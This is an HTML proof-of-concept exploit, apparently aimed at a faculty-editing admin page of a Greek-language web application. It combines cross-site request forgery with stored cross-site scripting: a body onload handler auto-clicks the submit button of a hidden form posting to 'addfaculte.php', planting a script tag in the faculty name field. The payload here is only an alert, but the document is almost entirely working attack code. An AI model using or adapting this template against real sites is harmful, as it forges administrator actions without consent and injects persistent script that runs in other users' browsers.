<body onload='boomboom()'>
<form method="post" action="http://localhost:1180/modules/admin/addfaculte.php?a=3&c=1">


<td><input type='text' name='codefaculte' value='TMA' readonly='1' />
<td><input type='text' name='faculte' value='<script>alert("TMA XSS Attack");</script>' />
<td><input type='hidden' name='c' value='1' />
<input type='submit' name='edit' value='Επικύρωση Αλλαγών' id='boom'/>


<script type="text/javascript">
      function boomboom() {
        document.getElementById("boom").click();
      }
</script>